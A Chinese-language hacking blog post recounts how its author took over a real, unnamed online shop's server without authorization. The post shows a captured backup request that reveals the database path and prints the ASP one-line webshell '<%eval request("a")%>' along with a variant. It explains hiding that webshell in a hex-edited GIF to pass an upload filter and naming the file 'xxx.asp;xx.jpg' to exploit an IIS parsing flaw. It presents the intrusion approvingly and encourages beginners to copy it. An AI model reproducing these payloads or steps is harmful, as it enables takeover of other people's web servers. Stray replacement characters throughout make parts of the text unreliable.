這篇文章有點標題黨了�����,一句話木馬大家都不陌生�����,我想很多菜菜都體驗過他的強大之處吧�。提起一句話我們不由得想起了laker大俠啊��。可以說laker大俠的一句話木馬真是為我們廣大腳本入侵者帶來不少的方便。
今天我要講述的這個入侵過程就和一句話木馬密不可分�,說到這大家應該都知道最終拿下這個站的的方法肯定是利用一句話了�。不過這個站我還是費了好大周折才成功拿下一句話的��。下面讓我們一起回顧下整個過程吧�����。不會熟練使用一句話的小菜們可要認真看了,能熟練運用一句話的大蝦們也不要驕傲,說不定下面的方法就是你沒有嘗試過的哦����。
好了�����,事情起因還是以小菜拿到了網站后臺沒法拿webshell,找我求助來了,我們還是先到網站后臺看看到底是什么樣一個狀況吧。網址我就不發出來了,免得有些人品不好的小菜們拿去搞破壞�。
是一個什么電子商城的后臺�,不過我之前在前臺看了下給人的感覺就是不怎么樣���,剛那小菜應該就是通過注入漏洞拿到的賬號和密碼�。大約在后臺看了下基本情況,尋找可利用的信息���,有一個ewebeditor的編輯器,不過貌似是2.16以上版本的�,不存在注入漏洞�;另外有一個圖片上傳的功能���;還有一個數據庫備份恢復功能���,大致這些地方都是可以利用的�����。不過ewebeditor我已經嘗試了,默認登錄界面刪除��,數據庫名稱更改不可下載�。admin_style.asp文件驗證方式獨立,沒有與主站后臺使用同一種驗證����,有的網站的ewebeditor的后臺驗證與網站后臺一直�,這就導致登錄網站后臺后就可以直接訪問編輯器后臺程序�����。另外就是數據庫備份�,大家可以看下圖:
可見該備份功能不可自定義源數據庫路徑名稱及備份致的數數據庫路徑或名稱,不過當時看到這里我心理面有了一個想法就是既然不可以自己定義路徑及名稱�,我可以自己抓包然后更改數據庫后提交��。這個方法我以前在其他網站上有試過,而且成功過���。主要就是針對類似的數據庫備份功能,使用抓包工具抓下來然后更改后再用NC提交�。經過測試是可行的�����。這個方法以后又機會給大家單獨寫個文章出來,這次這里就不多說了。當然這個網站也不一定能成功�,我目的是要找到一個更方便的拿webshell的辦法�����,如果找到我認為比這個更方便的辦法我肯定會先嘗試,如果不行我再來嘗試剛才的想法了。
再繼續往下看有一個數據庫在線更名的功能:
而且還建議我使用asp的后綴�����,這不是明擺著讓我拿webshell嗎�����?呵呵!�����!不過當時我在這里還是猶豫了一下����,心想要是貿然的把數據庫更改成其他文件名了,一旦系統出錯我有不知道原來的數據庫名��,那不就全玩完兒���?不過猶豫歸猶豫吧���,我還是先看看利用這個功能拿webshell的前提條件吧�。這個前提條件就是要找到數據庫路徑。當然要找數據庫路徑的話在這里直接改名說不定系統就爆出數據庫路徑了�,不過為了安全起見沒有十足把握還是不得冒然去更改數據庫名稱��。
接下來找數據庫路徑的辦法很簡單直接用上面說到的數據庫備份功能,然后抓包?���?����!我在虛擬機上試了下,成功找到了數據庫路徑�����。捕獲到數據庫備份程序的數據包如下:
================================================================================
POST /admin/safe5.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxx.com/admin/safe5.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: www.xxxx.com
Content-Length: 87
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQCBSRCR=AMDHANDDDJGIMMMIGNELCGLF; buyok=temp=login&sql=&admin=mingdadz; ASPSESSIONIDQSBCTRDR=AEPLBLEDMNBOAIHMDMFIIBKP
oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdb&Submit=%B1%B8%B7%DD&backup=ok
================================================================================
注意看最后的oldpath=這里..%2Fdata%2Fshopbackupd.asp就是網站當前使用的數據庫路徑了����,后面的&DBname=shopbackup.mdb就是備份后的數據庫路徑��。當前數據庫路徑中那個%2F就是“/”�,所以數據庫路徑就是../data/shopbackupd.asp了�����,而當前執行的文件路徑在admin目錄下����,“../”這個就表示上一級目錄�����!所以最終的數據庫路徑就是http://www.xxxxx.com/data/shopbackupd.asp了�����!好了數據庫路徑找到了�,而且還是asp格式的��,那現在拿webshell的思路又換了��,就沒必要使用數據庫改名那個功能了,可以直接在后臺找個地方插入一句話木馬�����。說歸說�����,咱們還是先來看看數據庫情況吧,懷著激動的心情直接訪問數據庫卻返回以下錯誤!
丫丫的����,看來是管理員在數據庫中做了手腳����,想讓ASP程序在數據庫中得不到正常的運行��,所以他在數據庫的最前面就搞一個ASP的錯誤出來����,這樣后面的ASP程序就得不到執行了����,那我們就算插入一句話,得不到執行也是白搭啊。要想通過數據內容的方法終結掉他這個錯誤的話那幾乎是不可能的啊��。我試過輸入%><%eval request("a")%>這樣的變形一句話都沒能終結掉他這個錯誤�。看來這個拿webshell的思路及那個改名都要宣告失敗了。
既然這樣那只好再尋他路了,這個時候還是想到利用數據庫備份哪里,想抓包更改數據包再NC提交,不過這個還是要有前提條件的啦�,前提是要上傳一個圖片格式的木馬�����,然后再把數據包中源數據庫路徑替換成上傳的圖片馬,再把備份成的數據庫擴展名更改成asp、asa�、cer或者cdx等服務器可以執行的格式����。oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdb也就是這部分�,當然更改之前要計算好數據包的大小。想到這里,那現在就要去找個上傳圖片的地方了,這個可容易多了����,網站有直接上傳圖片的程序,而且還有個編輯器�����,可以說上傳圖片馬應該是沒問題的了��。
之前我也看過他網站自帶的一個上傳圖片的程序��,大約看了下沒什么可利用的,這次再次打開���,然后上傳一個圖片馬。
提示上傳成功了��,點擊預覽上傳的文件看看����,結果看到的確是一篇空白。
丫丫的�����,杯具了��。�。�。按理說上傳成功訪問應該是一個圖片的X才對啊,怎么是一篇空白呢�,我查看源碼也是一片空白��。丫丫的��,用這個不行咱換ewebeditor上傳圖片再試試,結果還是一片空白����,我郁悶了�����。難道是給殺了��?然后我上傳一個加密的asp馬也是,難道我加密的也給殺�?接著我又換圖片里插入了一句話的上去也是一樣�����,都是空白,而我上傳正常的圖片卻沒問題�����。我插呀��。���。最終試了半天�����,總結出來了,是圖片里面帶有<%%>符號的傳上去都是空白�。�。��。而不帶符號的傳上去都沒問題�����。。我插還讓不讓人活了��?�����??圖片木馬傳不上去就算那個抓包的數據庫備份能成功又有啥用呢。��。誒��。到這里我幾乎都想放棄了�。
不過�,就在我鼓搗這個上傳圖片地方的時候我偶然發現一個地方,很是讓我興奮!���!看下圖:
仔細看這兩個圖,上圖是上傳文件之前的截圖,下圖是上傳文件之后的截圖�,發現有什么問題了嗎����?哈哈���,如果你沒發現讓我來告訴你���,仔細看上圖中地址欄里面的地址�����,然后看下圖中文件上傳之后的路徑��。發現了嗎?上圖中有個0325,下圖中圖片名稱就是0325,哈哈看到這里我也很興奮���,難道是圖片的命名規則是根據上圖中fupnam的值來命名的?如果真要是這樣的話,那就可以利用IIS的解析漏洞了��!為了驗證我的想法�����,我吧路徑更愛成了這樣����!然后上傳插入了一句話客戶端的圖片文件��,注意紅線標注的地方���。
提示成功上傳���,見下圖:
看到了嗎�?多么淫蕩的一個圖片文件名啊�。。。不過����,在點擊預覽上傳文件的時候看到的圖片還是一片空白�����,我郁悶了。。。難道非要讓我如此杯具??
做到這里�����,幾乎又讓我進入放棄的邊緣��,經過冷靜思考后決定從上傳的圖片入手��。之前有看到過一個教程中使用的插入有一句話客戶端的圖片能正常顯示,而我自己的卻是不能正常顯示原圖的����。貌似那個教程中有提到過說那個圖片是使用十六進制編輯過的���。難道是在十六進制模式下插入的一句話客戶段����?而我插入一句話客戶端的方式是直接用記事本打開圖片文件���,然后在結尾處插入����。
經過如此一分析��,我決定死馬當活馬醫了��,先找了一個正常顯示的gif圖片,然后用C32十六進制編輯��,為了驗證在十六進制模式下編輯后圖片能正常顯示�����,我首先在結尾隨便插入了點內容���,然后保存圖片�,查看圖片顯示正常�。
如此折騰一番后確定在十六進制模式下編輯的圖片能正常顯示后,我就在最后直接寫上了一句話客戶端�����。然后再保存測試����,依然正常顯示,并且我還將圖片名稱更改成xxx.asp;xx.jpg格式��,然后放到我電腦的ASP運行環境下測試�,能正常使用一句話連接。
不過在對用十六進制編輯過后的圖片用記事本打開查看依然能看到直接的明文<%eval request("a")%>��,上文說過��,那個上傳圖片對圖片驗證很嚴格,所有內容當中包含有<%%>符號的上傳上去后訪問都是空白。不知道這次能不能成功共呢�。其實當時也沒抱多大的希望上傳了使用十六進制更改過的圖片����。上傳成功后去訪問,這次圖片就老老實實的顯示出來了����。
緊接著就是讓laker的一句話連接段上場了�����,抄出我美化過的laker一句話連接段,填上地址密碼進行連接����。
哈哈�,看到了把�,一句話成功的執行了,接下來拿webshell那就是易如反掌的事情了���,總的來說這次拿下這個站主要的方法還是一句話+IIS解析漏洞了。不過這個一句話只經過特殊處理的哦���,我想這個十六進制編輯一句話圖片馬對高手來說應該沒什么了,不過對小菜們來說應該是一個很不錯的技術啦��。當然我之前也不知道的����,以前拿類似的站我都是用直接用記事本編輯的一句話圖片馬做的,這次遇上的還是頭一次啊�����。不過自己也有所收獲�����。至少我以后的一句話圖片馬都會使用十六進制編輯過的,比之前用的肯定要高級點了。建議小菜們下來也自己做一個屬于自己的一句話圖片馬吧�����,很實用的����。
該文章在 2020/11/30 16:06:55 編輯過
400 186 1886
